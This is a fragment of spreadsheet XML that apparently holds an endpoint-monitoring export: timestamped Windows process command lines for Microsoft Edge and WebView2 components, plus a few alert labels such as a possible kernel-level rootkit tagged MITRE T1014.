--disable-features=BackForwardCache,BackgroundTabLoadingFromPerformanceManager,CloseOmniboxPopupOnInactiveAreaClick,CollectAVProductsInfo,CollectCodeIntegrityInfo,EnableHangWatcher,FilterAdsOnAbusiveSites,GetWifiProtocol,LoginDetection,PreconnectToSearch,SafetyHub,SegmentationPlatform,SpareRendererForSitePerProcess,Ukm,WebPayments,msAITrackerClassification,msAbydosForWindowlessWV2,msAffirmVirtualCard,msAllowChromeWebstore,msAllowMSAPrtSSOForNonMSAProfile,msApplicationGuard,msAskBeforeClosingMultipleTabs,msAutoToggleAADPrtSSOForNonAADProfile,msAutofillEdgeCoupons,msAutofillEdgeCouponsAutoApply,msAutofillEdgeServiceRequest,msAutomaticTabFreeze,msBrowserSettingsSupported,msCoarseGeolocationService,msDataProtection,msDesktopMode,msDesktopRewards,msDisableVariationsSeedFetchThrottling,msEEProactiveHistory,msETFOffstoreExtensionFileDataCollection,msETFPasswordTheftDNRActionSignals,msEdgeAdPlatformUI,msEdgeAddWebCapturetoCollections,msEdgeAutofillAdvancedSuggestionsBasic,msEdgeAutofillOneClickAutocomplete,msEdgeAutofillSaveGSPR100InDb,msEdgeAutofillShowDeployedPassword,msEdgeAutofillSs,msEdgeBrowserEssentialsShowUpdateSection,msEdgeCloudConfigService,msEdgeCloudConfigServiceV2,msEdgeCohorts,msEdgeCollectionsPrismExperiment1,msEdgeCollectionsPrismOverallMigration,msEdgeComposeNext,msEdgeEnableNurturingFramework,msEdgeEnclavePrefsBasic,msEdgeEnclavePrefsNotification,msEdgeFaviconService,msEdgeHJTelemetry,msEdgeHubAppSkype,msEdgeImageEditorUI,msEdgeLinkDoctor,msEdgeMouseGestureDefaultEnabled,msEdgeMouseGestureSupported,msEdgeNewDeviceFre,msEdgeOnRampFRE,msEdgeOnRampImport,msEdgePDFCMHighlightUX,msEdgePasswordIris,msEdgePasswordIrisSaveBubble,msEdgeProngPersonalization,msEdgeReadingView,msEdgeRose,msEdgeSendTabToSelf,msEdgeSettingsImport,msEdgeSettingsImportV2,msEdgeShoppingPersistentStorage,msEdgeShoppingUI,msEdgeSmartFind,msEdgeSuperDragDefaultEnabled,msEdgeSuperDragDropSupported,msEdgeTipping,msEdgeTranslate,msEdgeUseCaptivePortalService,msEdgeWebContentFilteringFeedback,msEdgeWorkSearchBanner,msEnableCustomJobMemoryLimitsOnXbox,msEnableMIPForPDF,msEnablePdfUpsell,msEnableThirdPartyScanning,msEnableWebSignInCta,msEnableWebToBrowserSignIn,msEndpointDlp,msEntityExtraction,msExtensionTelemetryFramework,msExternalTaskManager,msFileSystemAccessDirectoryIterationBlocklistCheck,msForceBrowserSignIn,msForeignSessionsPage,msGeolocationAccessService,msGeolocationOSLocationPermissionFallback,msGeolocationSQMService,msGeolocationService,msGrowthInfraLaunchSourceLogging,msGuidedSwitchAllowed,msHubPinPersist,msImplicitSignin,msIrm,msIrmv2,msKlarnaVirtualCard,msLoadStatistics,msLogIsEdgePinnedToTaskbarOnLaunch,msMIPCrossTenantPdfViewSupport,msMdatpWebSiteDlp,msNotificationPermissionForPWA,msOnHoverSearchInSidebar,msOpenOfficeDocumentsInWebViewer,msPasswordBreachDetection,msPdfAnnotationsVisibility,msPdfDataRecovery,msPdfDigitalSignatureRead,msPdfFreeText,msPdfFreeTextForCJK,msPdfHighlightMode,msPdfInking,msPdfKeyphraseSupport,msPdfOOUI,msPdfPopupMarkerRenderer,msPdfShare,msPdfSharedLibrary,msPdfTextNote,msPdfTextNoteMoreMenu,msPdfThumbnailCache,msPdfUnderside,msPdfViewRestore,msPersonalizationUMA,msPriceComparison,msPromptDefaultHandlerForPDF,msReactiveSearch,msReadAloud,msReadAloudPdf,msRedirectToShoreline,msRevokeExtensions,msSaasDlp,msShoppingTrigger,msShorelineSearch,msShorelineSearchFindOnPageWebUI,msShowOfflineGameEntrance,msShowReadAloudIconInAddressBar,msShowUXForAADPrtSSOForNonAADProfile,msSuspendMessageForNewSessionWhenHavingPendingNavigation,msSyncEdgeCollections,msTabResourceStats,msTokenizationAutofillInlineEnabled,msTouchMode,msTriggeringSignalGenerator,msUserUnderstanding,msVideoSuperResolutionUI,msWalletBuyNow,msWalletCheckout,msWalletDiagnosticDataLogger,msWalletHubEntry,msWalletHubIntlP3,msWalletPartialCard,msWalletPasswordCategorization,msWalletPasswordCategorizationPlatformExpansion,msWalletTokenizationCardMetadata,msWalletTokenizedAutofill,msWebAssist,msWebAssistHistorySearchService,msWebOOUI,msWindowsUserActivities,msZipPayVirtualCard --variations-seed-version --mojo-platform-channel-handle=2064 /prefetch:11 /pfhostedapp:bbee653ad5d461f7265ca33b8d62b0b69aeb801d</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:26:43.367</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:26:43.368</t>
  </si>
  <si>
    <t>\"C:\\Program Files (x86)\\Microsoft\\EdgeWebView\\Application\\135.0.3179.98\\msedgewebview2.exe\" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-GB --service-sandbox-type=service --noerrdialogs --user-data-dir=\"C:\\Users\\Engineer\\AppData\\Local\\Packages\\MicrosoftWindows.Client.WebExperience_cw5n1h2txyewy\\LocalState\\EBWebView\" --webview-exe-name=Widgets.exe --webview-exe-version=525.8401.20.0 --embedded-browser-webview=1 --no-pre-read-main-dll --always-read-main-dll --field-trial-handle=1788,i,9932586443574054993,11319253262182182435,262144 --enable-features=ForceSWDCompWhenDCompFallbackRequired,msAggressiveCacheTrimming,msCustomDataPartition,msWebView2NoTabForScreenShare,msWindowsTaskManager --disable-features=BackForwardCache,BackgroundTabLoadingFromPerformanceManager,CloseOmniboxPopupOnInactiveAreaClick,CollectAVProductsInfo,CollectCodeIntegrityInfo,EnableHangWatcher,FilterAdsOnAbusiveSites,GetWifiProtocol,LoginDetection,PreconnectToSearch,SafetyHub,SegmentationPlatform,SpareRendererForSitePerProcess,Ukm,WebPayments,msAITrackerClassification,msAbydosForWindowlessWV2,msAffirmVirtualCard,msAllowChromeWebstore,msAllowMSAPrtSSOForNonMSAProfile,msApplicationGuard,msAskBeforeClosingMultipleTabs,msAutoToggleAADPrtSSOForNonAADProfile,msAutofillEdgeCoupons,msAutofillEdgeCouponsAutoApply,msAutofillEdgeServiceRequest,msAutomaticTabFreeze,msBrowserSettingsSupported,msCoarseGeolocationService,msDataProtection,msDesktopMode,msDesktopRewards,msDisableVariationsSeedFetchThrottling,msEEProactiveHistory,msETFOffstoreExtensionFileDataCollection,msETFPasswordTheftDNRActionSignals,msEdgeAdPlatformUI,msEdgeAddWebCapturetoCollections,msEdgeAutofillAdvancedSuggestionsBasic,msEdgeAutofillOneClickAutocomplete,msEdgeAutofillSaveGSPR100InDb,msEdgeAutofillShowDeployedPassword,msEdgeAutofillSs,msEdgeBrowserEssentialsShowUpdateSection,msEdgeCloudConfigService,msEdgeCloudConfigServiceV2,msEdgeCohorts,msEdgeCollectionsPrismExperiment1,msEdgeCollectionsPrismOverallMigration,msEdgeComposeNext,msEdgeEnableNurturingFramework,msEdgeEnclavePrefsBasic,msEdgeEnclavePrefsNotification,msEdgeFaviconService,msEdgeHJTelemetry,msEdgeHubAppSkype,msEdgeImageEditorUI,msEdgeLinkDoctor,msEdgeMouseGestureDefaultEnabled,msEdgeMouseGestureSupported,msEdgeNewDeviceFre,msEdgeOnRampFRE,msEdgeOnRampImport,msEdgePDFCMHighlightUX,msEdgePasswordIris,msEdgePasswordIrisSaveBubble,msEdgeProngPersonalization,msEdgeReadingView,msEdgeRose,msEdgeSendTabToSelf,msEdgeSettingsImport,msEdgeSettingsImportV2,msEdgeShoppingPersistentStorage,msEdgeShoppingUI,msEdgeSmartFind,msEdgeSuperDragDefaultEnabled,msEdgeSuperDragDropSupported,msEdgeTipping,msEdgeTranslate,msEdgeUseCaptivePortalService,msEdgeWebContentFilteringFeedback,msEdgeWorkSearchBanner,msEnableCustomJobMemoryLimitsOnXbox,msEnableMIPForPDF,msEnablePdfUpsell,msEnableThirdPartyScanning,msEnableWebSignInCta,msEnableWebToBrowserSignIn,msEndpointDlp,msEntityExtraction,msExtensionTelemetryFramework,msExternalTaskManager,msFileSystemAccessDirectoryIterationBlocklistCheck,msForceBrowserSignIn,msForeignSessionsPage,msGeolocationAccessService,msGeolocationOSLocationPermissionFallback,msGeolocationSQMService,msGeolocationService,msGrowthInfraLaunchSourceLogging,msGuidedSwitchAllowed,msHubPinPersist,msImplicitSignin,msIrm,msIrmv2,msKlarnaVirtualCard,msLoadStatistics,msLogIsEdgePinnedToTaskbarOnLaunch,msMIPCrossTenantPdfViewSupport,msMdatpWebSiteDlp,msNotificationPermissionForPWA,msOnHoverSearchInSidebar,msOpenOfficeDocumentsInWebViewer,msPasswordBreachDetection,msPdfAnnotationsVisibility,msPdfDataRecovery,msPdfDigitalSignatureRead,msPdfFreeText,msPdfFreeTextForCJK,msPdfHighlightMode,msPdfInking,msPdfKeyphraseSupport,msPdfOOUI,msPdfPopupMarkerRenderer,msPdfShare,msPdfSharedLibrary,msPdfTextNote,msPdfTextNoteMoreMenu,msPdfThumbnailCache,msPdfUnderside,msPdfViewRestore,msPersonalizationUMA,msPriceComparison,msPromptDefaultHandlerForPDF,msReactiveSearch,msReadAloud,msReadAloudPdf,msRedirectToShoreline,msRevokeExtensions,msSaasDlp,msShoppingTrigger,msShorelineSearch,msShorelineSearchFindOnPageWebUI,msShowOfflineGameEntrance,msShowReadAloudIconInAddressBar,msShowUXForAADPrtSSOForNonAADProfile,msSuspendMessageForNewSessionWhenHavingPendingNavigation,msSyncEdgeCollections,msTabResourceStats,msTokenizationAutofillInlineEnabled,msTouchMode,msTriggeringSignalGenerator,msUserUnderstanding,msVideoSuperResolutionUI,msWalletBuyNow,msWalletCheckout,msWalletDiagnosticDataLogger,msWalletHubEntry,msWalletHubIntlP3,msWalletPartialCard,msWalletPasswordCategorization,msWalletPasswordCategorizationPlatformExpansion,msWalletTokenizationCardMetadata,msWalletTokenizedAutofill,msWebAssist,msWebAssistHistorySearchService,msWebOOUI,msWindowsUserActivities,msZipPayVirtualCard --variations-seed-version --mojo-platform-channel-handle=2428 /prefetch:13 /pfhostedapp:bbee653ad5d461f7265ca33b8d62b0b69aeb801d</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:26:44.000</t>
  </si>
  <si>
    <t>Systemd: Service exited due to a failure.</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:26:44.733</t>
  </si>
  <si>
    <t>\"C:\\Program Files (x86)\\Microsoft\\Edge\\Application\\msedge.exe\" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-GB --service-sandbox-type=service --no-pre-read-main-dll --always-read-main-dll --field-trial-handle=1992,i,12765322401789080612,2666233780739743436,262144 --variations-seed-version --mojo-platform-channel-handle=2456 /prefetch:14</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:26:50.490</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:26:54.826</t>
  </si>
  <si>
    <t>\"C:\\Program Files (x86)\\Microsoft\\EdgeWebView\\Application\\135.0.3179.98\\msedgewebview2.exe\" --type=renderer --noerrdialogs --user-data-dir=\"C:\\Users\\Engineer\\AppData\\Local\\Packages\\MicrosoftWindows.Client.WebExperience_cw5n1h2txyewy\\LocalState\\EBWebView\" --webview-exe-name=Widgets.exe --webview-exe-version=525.8401.20.0 --embedded-browser-webview=1 --no-pre-read-main-dll --video-capture-use-gpu-memory-buffer --lang=en-GB --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=5 --js-flags=\"--expose-gc --ms-user-locale=\" --time-ticks-at-unix-epoch=-1746785842004876 --launch-time-ticks=579237862 --always-read-main-dll --field-trial-handle=1788,i,9932586443574054993,11319253262182182435,262144 --enable-features=ForceSWDCompWhenDCompFallbackRequired,msAggressiveCacheTrimming,msCustomDataPartition,msWebView2NoTabForScreenShare,msWindowsTaskManager --disable-features=BackForwardCache,BackgroundTabLoadingFromPerformanceManager,CloseOmniboxPopupOnInactiveAreaClick,CollectAVProductsInfo,CollectCodeIntegrityInfo,EnableHangWatcher,FilterAdsOnAbusiveSites,GetWifiProtocol,LoginDetection,PreconnectToSearch,SafetyHub,SegmentationPlatform,SpareRendererForSitePerProcess,Ukm,WebPayments,msAITrackerClassification,msAbydosForWindowlessWV2,msAffirmVirtualCard,msAllowChromeWebstore,msAllowMSAPrtSSOForNonMSAProfile,msApplicationGuard,msAskBeforeClosingMultipleTabs,msAutoToggleAADPrtSSOForNonAADProfile,msAutofillEdgeCoupons,msAutofillEdgeCouponsAutoApply,msAutofillEdgeServiceRequest,msAutomaticTabFreeze,msBrowserSettingsSupported,msCoarseGeolocationService,msDataProtection,msDesktopMode,msDesktopRewards,msDisableVariationsSeedFetchThrottling,msEEProactiveHistory,msETFOffstoreExtensionFileDataCollection,msETFPasswordTheftDNRActionSignals,msEdgeAdPlatformUI,msEdgeAddWebCapturetoCollections,msEdgeAutofillAdvancedSuggestionsBasic,msEdgeAutofillOneClickAutocomplete,msEdgeAutofillSaveGSPR100InDb,msEdgeAutofillShowDeployedPassword,msEdgeAutofillSs,msEdgeBrowserEssentialsShowUpdateSection,msEdgeCloudConfigService,msEdgeCloudConfigServiceV2,msEdgeCohorts,msEdgeCollectionsPrismExperiment1,msEdgeCollectionsPrismOverallMigration,msEdgeComposeNext,msEdgeEnableNurturingFramework,msEdgeEnclavePrefsBasic,msEdgeEnclavePrefsNotification,msEdgeFaviconService,msEdgeHJTelemetry,msEdgeHubAppSkype,msEdgeImageEditorUI,msEdgeLinkDoctor,msEdgeMouseGestureDefaultEnabled,msEdgeMouseGestureSupported,msEdgeNewDeviceFre,msEdgeOnRampFRE,msEdgeOnRampImport,msEdgePDFCMHighlightUX,msEdgePasswordIris,msEdgePasswordIrisSaveBubble,msEdgeProngPersonalization,msEdgeReadingView,msEdgeRose,msEdgeSendTabToSelf,msEdgeSettingsImport,msEdgeSettingsImportV2,msEdgeShoppingPersistentStorage,msEdgeShoppingUI,msEdgeSmartFind,msEdgeSuperDragDefaultEnabled,msEdgeSuperDragDropSupported,msEdgeTipping,msEdgeTranslate,msEdgeUseCaptivePortalService,msEdgeWebContentFilteringFeedback,msEdgeWorkSearchBanner,msEnableCustomJobMemoryLimitsOnXbox,msEnableMIPForPDF,msEnablePdfUpsell,msEnableThirdPartyScanning,msEnableWebSignInCta,msEnableWebToBrowserSignIn,msEndpointDlp,msEntityExtraction,msExtensionTelemetryFramework,msExternalTaskManager,msFileSystemAccessDirectoryIterationBlocklistCheck,msForceBrowserSignIn,msForeignSessionsPage,msGeolocationAccessService,msGeolocationOSLocationPermissionFallback,msGeolocationSQMService,msGeolocationService,msGrowthInfraLaunchSourceLogging,msGuidedSwitchAllowed,msHubPinPersist,msImplicitSignin,msIrm,msIrmv2,msKlarnaVirtualCard,msLoadStatistics,msLogIsEdgePinnedToTaskbarOnLaunch,msMIPCrossTenantPdfViewSupport,msMdatpWebSiteDlp,msNotificationPermissionForPWA,msOnHoverSearchInSidebar,msOpenOfficeDocumentsInWebViewer,msPasswordBreachDetection,msPdfAnnotationsVisibility,msPdfDataRecovery,msPdfDigitalSignatureRead,msPdfFreeText,msPdfFreeTextForCJK,msPdfHighlightMode,msPdfInking,msPdfKeyphraseSupport,msPdfOOUI,msPdfPopupMarkerRenderer,msPdfShare,msPdfSharedLibrary,msPdfTextNote,msPdfTextNoteMoreMenu,msPdfThumbnailCache,msPdfUnderside,msPdfViewRestore,msPersonalizationUMA,msPriceComparison,msPromptDefaultHandlerForPDF,msReactiveSearch,msReadAloud,msReadAloudPdf,msRedirectToShoreline,msRevokeExtensions,msSaasDlp,msShoppingTrigger,msShorelineSearch,msShorelineSearchFindOnPageWebUI,msShowOfflineGameEntrance,msShowReadAloudIconInAddressBar,msShowUXForAADPrtSSOForNonAADProfile,msSuspendMessageForNewSessionWhenHavingPendingNavigation,msSyncEdgeCollections,msTabResourceStats,msTokenizationAutofillInlineEnabled,msTouchMode,msTriggeringSignalGenerator,msUserUnderstanding,msVideoSuperResolutionUI,msWalletBuyNow,msWalletCheckout,msWalletDiagnosticDataLogger,msWalletHubEntry,msWalletHubIntlP3,msWalletPartialCard,msWalletPasswordCategorization,msWalletPasswordCategorizationPlatformExpansion,msWalletTokenizationCardMetadata,msWalletTokenizedAutofill,msWebAssist,msWebAssistHistorySearchService,msWebOOUI,msWindowsUserActivities,msZipPayVirtualCard --variations-seed-version --mojo-platform-channel-handle=3624 /pfhostedapp:bbee653ad5d461f7265ca33b8d62b0b69aeb801d /prefetch:1</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:26:57.284</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:26:57.285</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:27:03.068</t>
  </si>
  <si>
    <t>\"C:\\Program Files (x86)\\Microsoft\\Edge\\Application\\msedge.exe\" --type=utility --utility-sub-type=PooledProcess2 --lang=en-GB --service-sandbox-type=utility --no-pre-read-main-dll --always-read-main-dll --field-trial-handle=1992,i,12765322401789080612,2666233780739743436,262144 --variations-seed-version --mojo-platform-channel-handle=5836 /prefetch:14</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:27:03.453</t>
  </si>
  <si>
    <t>\"C:\\Program Files (x86)\\Microsoft\\EdgeUpdate\\Install\\{B81885CB-6C26-41B3-A6C8-F4F88D36E17D}\\EDGEMITMP_AE07F.tmp\\setup.exe\" --type=crashpad-handler /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler --database=C:\\WINDOWS\\SystemTemp\\MsEdgeCrashpad --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=136.0.7103.49 \"--annotation=exe=C:\\Program Files (x86)\\Microsoft\\EdgeUpdate\\Install\\{B81885CB-6C26-41B3-A6C8-F4F88D36E17D}\\EDGEMITMP_AE07F.tmp\\setup.exe\" --annotation=plat=Win64 --annotation=prod=Edge --annotation=ver=136.0.3240.50 --initial-client-data=0x248,0x24c,0x250,0x224,0x254,0x7ff665d7f3e8,0x7ff665d7f3f4,0x7ff665d7f400</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:27:03.502</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:27:04.891</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:27:06.902</t>
  </si>
  <si>
    <t>\"C:\\Program Files (x86)\\Microsoft\\Edge\\Application\\msedge.exe\"</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:27:07.570</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:27:07.573</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:27:07.612</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:27:10.334</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:27:10.339</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:27:10.377</t>
  </si>
  <si>
    <t>\"C:\\Program Files (x86)\\Microsoft\\Edge\\Application\\msedge.exe\" --type=renderer --pdf-upsell-enabled --no-pre-read-main-dll --video-capture-use-gpu-memory-buffer --lang=en-GB --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=17 --time-ticks-at-unix-epoch=-1746785587125926 --launch-time-ticks=840528471 --always-read-main-dll --field-trial-handle=1992,i,12765322401789080612,2666233780739743436,262144 --variations-seed-version --mojo-platform-channel-handle=5920 /prefetch:1</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:27:10.378</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:27:15.044</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:27:15.045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</si>
  <si>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--field-trial-handle=1992,i,12765322401789080612,2666233780739743436,262144 --variations-seed-version --mojo-platform-channel-handle=6240 /prefetch:14</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:27:15.552</t>
  </si>
  <si>
    <t>\"C:\\Program Files (x86)\\Microsoft\\Edge\\Application\\msedge.exe\" --type=utility --utility-sub-type=entity_extraction_service.mojom.Extractor --lang=en-GB --service-sandbox-type=entity_extraction --onnx-enabled-for-ee --no-pre-read-main-dll --always-read-main-dll --field-trial-handle=1992,i,12765322401789080612,2666233780739743436,262144 --variations-seed-version --mojo-platform-channel-handle=6288 /prefetch:14</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:27:15.559</t>
  </si>
  <si>
    <t>\"C:\\Program Files (x86)\\Microsoft\\Edge\\Application\\msedge.exe\" --type=renderer --instant-process --pdf-upsell-enabled --no-pre-read-main-dll --video-capture-use-gpu-memory-buffer --lang=en-GB --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=18 --time-ticks-at-unix-epoch=-1746785587125926 --launch-time-ticks=842940515 --always-read-main-dll --field-trial-handle=1992,i,12765322401789080612,2666233780739743436,262144 --variations-seed-version --mojo-platform-channel-handle=6140 /prefetch:1</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:27:16.025</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:27:16.152</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:27:17.999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</si>
  <si>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--renderer-client-id=21 --time-ticks-at-unix-epoch=-1746785587125926 --launch-time-ticks=845441372 --always-read-main-dll --field-trial-handle=1992,i,12765322401789080612,2666233780739743436,262144 --variations-seed-version --mojo-platform-channel-handle=6764 /prefetch:1</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:27:22.310</t>
  </si>
  <si>
    <t>\"C:\\Program Files (x86)\\Microsoft\\Edge\\Application\\msedge.exe\" --type=utility --utility-sub-type=edge_xpay_wallet.mojom.EdgeXPayWalletService --lang=en-GB --service-sandbox-type=utility --no-pre-read-main-dll --always-read-main-dll --field-trial-handle=1992,i,12765322401789080612,2666233780739743436,262144 --variations-seed-version --mojo-platform-channel-handle=7012 /prefetch:14</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:27:24.110</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:27:29.343</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:27:29.783</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:27:30.202</t>
  </si>
  <si>
    <t>\"C:\\Program Files (x86)\\Microsoft\\Edge\\Application\\msedge.exe\" --type=utility --utility-sub-type=audio.mojom.AudioService --lang=en-GB --service-sandbox-type=audio --no-pre-read-main-dll --always-read-main-dll --field-trial-handle=1992,i,12765322401789080612,2666233780739743436,262144 --variations-seed-version --mojo-platform-channel-handle=7304 /prefetch:12</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:27:33.271</t>
  </si>
  <si>
    <t>C:\\WINDOWS\\system32\\AUDIODG.EXE 0x000000000000052C 0x0000000000000520</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:27:35.708</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:27:37.395</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:27:37.452</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:27:37.456</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:27:37.457</t>
  </si>
  <si>
    <t>\"C:\\Program Files (x86)\\Microsoft\\Edge\\Application\\msedge.exe\" --type=utility --utility-sub-type=edge_collections.mojom.CollectionsDataManager --lang=en-GB --service-sandbox-type=collections --no-pre-read-main-dll --always-read-main-dll --field-trial-handle=1992,i,12765322401789080612,2666233780739743436,262144 --variations-seed-version --mojo-platform-channel-handle=4080 /prefetch:14</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:27:37.458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</si>
  <si>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--renderer-client-id=25 --time-ticks-at-unix-epoch=-1746785587125926 --launch-time-ticks=866600286 --always-read-main-dll --field-trial-handle=1992,i,12765322401789080612,2666233780739743436,262144 --variations-seed-version --mojo-platform-channel-handle=4480 /prefetch:1</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:27:39.057</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:27:44.784</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:27:44.788</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:27:45.134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</si>
  <si>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--renderer-client-id=26 --time-ticks-at-unix-epoch=-1746785587125926 --launch-time-ticks=876474940 --always-read-main-dll --field-trial-handle=1992,i,12765322401789080612,2666233780739743436,262144 --variations-seed-version --mojo-platform-channel-handle=6784 /prefetch:1</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:27:48.701</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:27:48.702</t>
  </si>
  <si>
    <t>C:\\WINDOWS\\System32\\svchost.exe -k WerSvcGroup</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:27:48.744</t>
  </si>
  <si>
    <t>werfault.exe /hc /shared Global\\a34b20694371476b970d9c43fc026c4b /t 8444 /p 8300</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:27:49.628</t>
  </si>
  <si>
    <t>\"C:\\Program Files (x86)\\Microsoft\\Edge\\Application\\136.0.3240.50\\identity_helper.exe\" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --lang=en-GB --service-sandbox-type=none --no-pre-read-main-dll --always-read-main-dll --field-trial-handle=1992,i,12765322401789080612,2666233780739743436,262144 --variations-seed-version --mojo-platform-channel-handle=8048 /prefetch:14</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:27:50.095</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:27:50.096</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:27:50.099</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:27:50.105</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:27:51.019</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:27:51.311</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:27:52.109</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:27:52.110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</si>
  <si>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--renderer-client-id=28 --time-ticks-at-unix-epoch=-1746785587125926 --launch-time-ticks=883238561 --always-read-main-dll --field-trial-handle=1992,i,12765322401789080612,2666233780739743436,262144 --variations-seed-version --mojo-platform-channel-handle=8116 /prefetch:1</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:27:52.111</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:27:52.113</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:27:52.280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</si>
  <si>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--renderer-client-id=29 --time-ticks-at-unix-epoch=-1746785587125926 --launch-time-ticks=883347388 --always-read-main-dll --field-trial-handle=1992,i,12765322401789080612,2666233780739743436,262144 --variations-seed-version --mojo-platform-channel-handle=6584 /prefetch:1</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:27:53.405</t>
  </si>
  <si>
    <t>\"C:\\Program Files (x86)\\Microsoft\\Edge\\Application\\msedge.exe\" --type=gpu-process --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=5140 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.26100.3624 --no-pre-read-main-dll --gpu-preferences=UAAAAAAAAADoAAAEAAAAAAAAAAAAAAAAAABgAAEAAAAAAAAAAAAAAAAAAABCAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAEAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAA --always-read-main-dll --field-trial-handle=1992,i,12765322401789080612,2666233780739743436,262144 --variations-seed-version --mojo-platform-channel-handle=7844 /prefetch:10</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:27:53.504</t>
  </si>
  <si>
    <t>\"C:\\Program Files (x86)\\Microsoft\\Edge\\Application\\msedge.exe\" --type=utility --utility-sub-type=edge_search_indexer.mojom.SearchIndexerInterfaceBroker --lang=en-GB --service-sandbox-type=search_indexer --message-loop-type-ui --no-pre-read-main-dll --always-read-main-dll --field-trial-handle=1992,i,12765322401789080612,2666233780739743436,262144 --variations-seed-version --mojo-platform-channel-handle=4684 /prefetch:14</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:27:55.442</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:28:02.771</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:28:03.322</t>
  </si>
  <si>
    <t>\"C:\\Program Files (x86)\\Microsoft\\Edge\\Application\\msedge.exe\" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-GB --service-sandbox-type=service --no-pre-read-main-dll --always-read-main-dll --field-trial-handle=1992,i,12765322401789080612,2666233780739743436,262144 --variations-seed-version --mojo-platform-channel-handle=8276 /prefetch:14</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:28:06.372</t>
  </si>
  <si>
    <t>\"C:\\WINDOWS\\System32\\SearchProtocolHost.exe\" Global\\UsGthrFltPipeMssGthrPipe_S-1-5-21-1228744127-581660863-1459446450-10014_ Global\\UsGthrCtrlFltPipeMssGthrPipe_S-1-5-21-1228744127-581660863-1459446450-10014 1 -2147483646 \"Software\\Microsoft\\Windows Search\" \"Mozilla/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\" \"C:\\ProgramData\\Microsoft\\Search\\Data\\Temp\\usgthrsvc\" \"DownLevelDaemon\"  \"1\"</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:28:06.388</t>
  </si>
  <si>
    <t>Summary event of the report's signatures.</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:28:06.464</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:28:06.994</t>
  </si>
  <si>
    <t>Possible kernel level rootkit</t>
  </si>
  <si>
    <t>[T1014]</t>
  </si>
  <si>
    <t>[Defense Evasion]</t>
  </si>
  <si>
    <t>[Rootkit]</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:28:12.610</t>
  </si>
